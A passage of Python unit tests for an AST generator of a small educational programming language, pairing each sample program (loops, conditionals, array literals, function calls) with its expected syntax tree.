Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')]),ArrayLiteral([StringLiteral(\"\"\"asdab\"\"\"),ArrayLiteral([IntLiteral(1),FloatLiteral(200.0),FloatLiteral(1230.0),StringLiteral(\"\"\"nothing\"\"\")])])]),CallStmt(Id('printLn'),[]),CallStmt(Id('print'),[Id('arg')]),CallStmt(Id('printStrLn'),[Id('arg')]),CallStmt(Id('read'),[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,365))\n\n\tdef test_389(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, b\nBody:\nWhile statement Do Break; EndWhile.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None)],([],[While(Id('statement'),([],[Break()]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,389))\n\n\tdef test_335(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = \"abc\", a < 2, i + 1) Do something(); EndFor.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),StringLiteral(\"\"\"abc\"\"\"),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",Id('i'),IntLiteral(1)),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,335))\n\n\tdef test_399(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, a[1][12]\nBody:\nFor(i=expr, a =/= {{}}, \"what is that\" + 1) Do\nEndFor.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[For(Id('i'),Id('expr'),BinaryOp(\"\"\"=/=\"\"\",Id('a'),ArrayLiteral([ArrayLiteral([])])),BinaryOp(\"\"\"+\"\"\",StringLiteral(\"\"\"what is that\"\"\"),IntLiteral(1)),([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,399))\n\n\tdef test_328(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\nIf 1 < a Then\nVar: a;\nEndIf.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[If([(BinaryOp(\"\"\"<\"\"\",IntLiteral(1),Id('a')),[VarDecl(Id('a'),[],None)],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,328))\n\n\tdef test_342(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x && y || b) ** && (a || abc)** Do something(); EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[While(UnaryOp(\"\"\"!\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",Id('x'),Id('y')),Id('b'))),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,342))\n\n\tdef test_334(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\nFor (i = 1, a < 2, i + 1) Do something(); EndFor.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(1),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",Id('i'),IntLiteral(1)),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,334))\n\n\tdef test_336(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something(); EndFor.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(18),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",Id('i'),CallExpr(Id('foo'),[])),IntLiteral(1)),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,336))\n\n\tdef test_300(self):\n\t\tinput = \"\"\"Var:x;\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],None)])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,300))\n\n\tdef test_303(self):\n\t\tinput = \"\"\"Var:x = 1, y = \"abc\", z = 1e2, l=True, a[1][2]={{1},{2}};\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('y'),[],StringLiteral(\"\"\"abc\"\"\")),VarDecl(Id('z'),[],FloatLiteral(100.0)),VarDecl(Id('l'),[],BooleanLiteral(True)),VarDecl(Id('a'),[1,2],ArrayLiteral([ArrayLiteral([IntLiteral(1)]),ArrayLiteral([IntLiteral(2)])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,303))\n\n\tdef test_360(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a[c[1][b]][1] + foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('a'),[ArrayCell(Id('c'),[IntLiteral(1),Id('b')]),IntLiteral(1)]),CallExpr(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')])])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,360))\n\n\tdef test_376(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n b = {{{}}};\n a = (a + b) +. (a-a-.a*a*.a\\.b%!c&&a||a==b) % a[1][1];\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('b'),ArrayLiteral([ArrayLiteral([ArrayLiteral([])])])),Assign(Id('a'),BinaryOp(\"\"\"+.\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),BinaryOp(\"\"\"%\"\"\",BinaryOp(\"\"\"==\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"-.\"\"\",BinaryOp(\"\"\"-\"\"\",Id('a'),Id('a')),BinaryOp(\"\"\"%\"\"\",BinaryOp(\"\"\"\\.\"\"\",BinaryOp(\"\"\"*.\"\"\",BinaryOp(\"\"\"*\"\"\",Id('a'),Id('a')),Id('a')),Id('b')),UnaryOp(\"\"\"!\"\"\",Id('c')))),Id('a')),Id('a')),Id('b')),ArrayCell(Id('a'),[IntLiteral(1),IntLiteral(1)]))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,376))\n\n\tdef test_314(self):\n\t\tinput = \"\"\"Var: x = \"yay\";\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],StringLiteral(\"\"\"yay\"\"\"))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,314))\n\n\tdef test_331(self):\n\t\tinput = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 + 1 Then\n For (i=1,i>1,1+2) Do\n Var: a=10,c[1]={1,2};\n c[foo() + 1] = a;\n EndFor.\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[If([(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(1)),[],[For(Id('i'),IntLiteral(1),BinaryOp(\"\"\">\"\"\",Id('i'),IntLiteral(1)),BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(2)),([VarDecl(Id('a'),[],IntLiteral(10)),VarDecl(Id('c'),[1],ArrayLiteral([IntLiteral(1),IntLiteral(2)]))],[Assign(ArrayCell(Id('c'),[BinaryOp(\"\"\"+\"\"\",CallExpr(Id('foo'),[]),IntLiteral(1))]),Id('a'))]))])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,331))\n\n\tdef test_346(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While a[1][c[2]] + 123 -1 EndDo.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('a'),[IntLiteral(1),ArrayCell(Id('c'),[IntLiteral(2)])]),IntLiteral(123)),IntLiteral(1)))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,346))\n\n\tdef test_366(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nfoo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\nprintLn();\n**print(arg);\nprintStrLn(arg)**\nread();\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')]),ArrayLiteral([StringLiteral(\"\"\"asdab\"\"\"),ArrayLiteral([IntLiteral(1),FloatLiteral(200.0),FloatLiteral(1230.0),StringLiteral(\"\"\"nothing\"\"\")])])]),CallStmt(Id('printLn'),[]),CallStmt(Id('read'),[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,366))\n\n\tdef test_396(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n While expr Do EndWhile.\n Do Return; While {{}} EndDo.\n Else nothing(); a=(1==b+a);\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[If([(Id('expr'),[],[]),(Id('expr'),[],[While(Id('expr'),([],[])),Dowhile(([],[Return(None)]),ArrayLiteral([ArrayLiteral([])]))])],([],[CallStmt(Id('nothing'),[]),Assign(Id('a'),BinaryOp(\"\"\"==\"\"\",IntLiteral(1),BinaryOp(\"\"\"+\"\"\",Id('b'),Id('a'))))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,396))\n\n\tdef test_364(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\n printLn();\n print(arg);\n printStrLn(arg);\n read();\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')]),ArrayLiteral([StringLiteral(\"\"\"asdab\"\"\"),ArrayLiteral([IntLiteral(1),FloatLiteral(200.0),FloatLiteral(1230.0),StringLiteral(\"\"\"nothing\"\"\")])])]),CallStmt(Id('printLn'),[]),CallStmt(Id('print'),[Id('arg')]),CallStmt(Id('printStrLn'),[Id('arg')]),CallStmt(Id('read'),[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,364))\n\n\tdef test_338(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something();\n c = a[23][b[1][2][c]] +. 12.; \n EndFor.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(18),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",Id('i'),CallExpr(Id('foo'),[])),IntLiteral(1)),([],[CallStmt(Id('something'),[]),Assign(Id('c'),BinaryOp(\"\"\"+.\"\"\",ArrayCell(Id('a'),[IntLiteral(23),ArrayCell(Id('b'),[IntLiteral(1),IntLiteral(2),Id('c')])]),FloatLiteral(12.0)))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,338))\n\n\tdef test_394(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n Else\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[If([(Id('expr'),[],[]),(Id('expr'),[],[])],([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,394))\n\n\tdef test_307(self):\n\t\tinput = \"\"\"Var: x;\nFunction: fact\nParameter: n\nBody:\nIf n == 0 Then\nReturn 1;\nElse\nReturn n * fact(n-1);\nEndIf.\nEndBody.\nFunction: main\n** this is a comment **\nBody:\nx = 10;\nfact (x);\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],None),FuncDecl(Id('fact'),[VarDecl(Id('n'),[],None)],([],[If([(BinaryOp(\"\"\"==\"\"\",Id('n'),IntLiteral(0)),[],[Return(IntLiteral(1))])],([],[Return(BinaryOp(\"\"\"*\"\"\",Id('n'),CallExpr(Id('fact'),[BinaryOp(\"\"\"-\"\"\",Id('n'),IntLiteral(1))])))]))])),FuncDecl(Id('main'),[],([],[Assign(Id('x'),IntLiteral(10)),CallStmt(Id('fact'),[Id('x')])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,307))\n\n\tdef test_402(self):\n\t\tinput = \"\"\"Var:x = 1, y = 0X5F, z = 0O11, k = True, z = False;\n Var: x = 1e05 , y = 1.e05 , z= 1.25 , k =\"Hohoho\";\n Var: x =\" hehe \" , y = {} , z = {1,2,3}, k ={1,{2,3},True};\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('y'),[],IntLiteral(95)),VarDecl(Id('z'),[],IntLiteral(9)),VarDecl(Id('k'),[],BooleanLiteral(True)),VarDecl(Id('z'),[],BooleanLiteral(False)),VarDecl(Id('x'),[],FloatLiteral(100000.0)),VarDecl(Id('y'),[],FloatLiteral(100000.0)),VarDecl(Id('z'),[],FloatLiteral(1.25)),VarDecl(Id('k'),[],StringLiteral(\"\"\"Hohoho\"\"\")),VarDecl(Id('x'),[],StringLiteral(\"\"\" hehe \"\"\")),VarDecl(Id('y'),[],ArrayLiteral([])),VarDecl(Id('z'),[],ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3)])),VarDecl(Id('k'),[],ArrayLiteral([IntLiteral(1),ArrayLiteral([IntLiteral(2),IntLiteral(3)]),BooleanLiteral(True)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,402))\n\n\tdef test_386(self):\n\t\tinput = \"\"\"\n Function: nothing\n Body:\n Var: a = {1238,32412, 120};\n EndBody.\n Function: foo\n Parameter: a,b,c\n Body:\n nothing(a[1][1][b[k]]);\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('nothing'),[],([VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(1238),IntLiteral(32412),IntLiteral(120)]))],[])),FuncDecl(Id('foo'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None)],([],[CallStmt(Id('nothing'),[ArrayCell(Id('a'),[IntLiteral(1),IntLiteral(1),ArrayCell(Id('b'),[Id('k')])])])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,386))\n\n\tdef test_382(self):\n\t\tinput = \"\"\"\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n ElseIf a \\ 100 -20 Then Continue;\n stop();\n what();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1,100],None)],([],[While(BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b')),([],[If([(BinaryOp(\"\"\">\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('doNothing'),[]),Break()]),(UnaryOp(\"\"\"!\"\"\",CallExpr(Id('somecon'),[])),[],[CallStmt(Id('doSomething'),[])]),(BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"\\\\\"\"\",Id('a'),IntLiteral(100)),IntLiteral(20)),[],[Continue(),CallStmt(Id('stop'),[]),CallStmt(Id('what'),[])])],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"+\"\"\",Id('a'),ArrayCell(CallExpr(Id('foo'),[]),[IntLiteral(100)])))]))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,382))\n\n\tdef test_383(self):\n\t\tinput = \"\"\"Function: foo\nBody:\n\nIf a > b Then doNothing(); Break;\n\nElseIf !somecon() Then doSomething();\n\nElseIf a \\ 100 -20 Then Continue;\nstop();\n\nElseIf whatever() Then \n\nElseIf anything() Then Do something(); While a + foo()[100] EndDo.\nEndIf.\nEndBody.\nFunction: main\nParameter: a, b[1][100]\nBody:\nWhile a<b Do\nEndWhile.\nEndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('foo'),[],([],[If([(BinaryOp(\"\"\">\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('doNothing'),[]),Break()]),(UnaryOp(\"\"\"!\"\"\",CallExpr(Id('somecon'),[])),[],[CallStmt(Id('doSomething'),[])]),(BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"\\\\\"\"\",Id('a'),IntLiteral(100)),IntLiteral(20)),[],[Continue(),CallStmt(Id('stop'),[])]),(CallExpr(Id('whatever'),[]),[],[]),(CallExpr(Id('anything'),[]),[],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"+\"\"\",Id('a'),ArrayCell(CallExpr(Id('foo'),[]),[IntLiteral(100)])))])],[])])),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1,100],None)],([],[While(BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b')),([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,383))\n\n\tdef test_352(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return ;\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(None)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,352))\n\n\tdef test_326(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]={12, \"asdf\"},b=1.21;\nVar: a,b[1]={\"this\"};\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('b'),[],FloatLiteral(1.21)),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,326))\n\n\tdef test_357(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nIf !(True) Then\n\na = a <c;\nIf (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\nEndIf.\nReturn main();\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(CallExpr(Id('main'),[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,357))\n\n\tdef test_351(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n Break;\n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Continue;\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Break(),Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Continue()]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,351))\n\n\tdef test_312(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n EndBody.\n Function: foo\n Parameter: a,b,c[1]\n Body:\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[])),FuncDecl(Id('foo'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[1],None)],([],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,312))\n\n\tdef test_316(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,316))\n\n\tdef test_387(self):\n\t\tinput = \"\"\"\n Function: foo\n Parameter: a,b,c\n Body:\n nothing(a[1][1][b[k]]);\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('foo'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None)],([],[CallStmt(Id('nothing'),[ArrayCell(Id('a'),[IntLiteral(1),IntLiteral(1),ArrayCell(Id('b'),[Id('k')])])])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,387))\n\n\tdef test_391(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: a[5] = {1,4,3,2,0};\n Var: b[2][3]={{1,2,3},{4,5,6}};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('a'),[5],ArrayLiteral([IntLiteral(1),IntLiteral(4),IntLiteral(3),IntLiteral(2),IntLiteral(0)])),VarDecl(Id('b'),[2,3],ArrayLiteral([ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3)]),ArrayLiteral([IntLiteral(4),IntLiteral(5),IntLiteral(6)])]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,391))\n\n\tdef test_309(self):\n\t\tinput = \"\"\"Var: x, y[1][3]={{{12,1}, {12., 12e3}},{23}, {13,32}};\nFunction: fact\nParameter: n\nBody:\na = a < b;\nIf n == 0 Then\nReturn 1;\nElse\nReturn n * 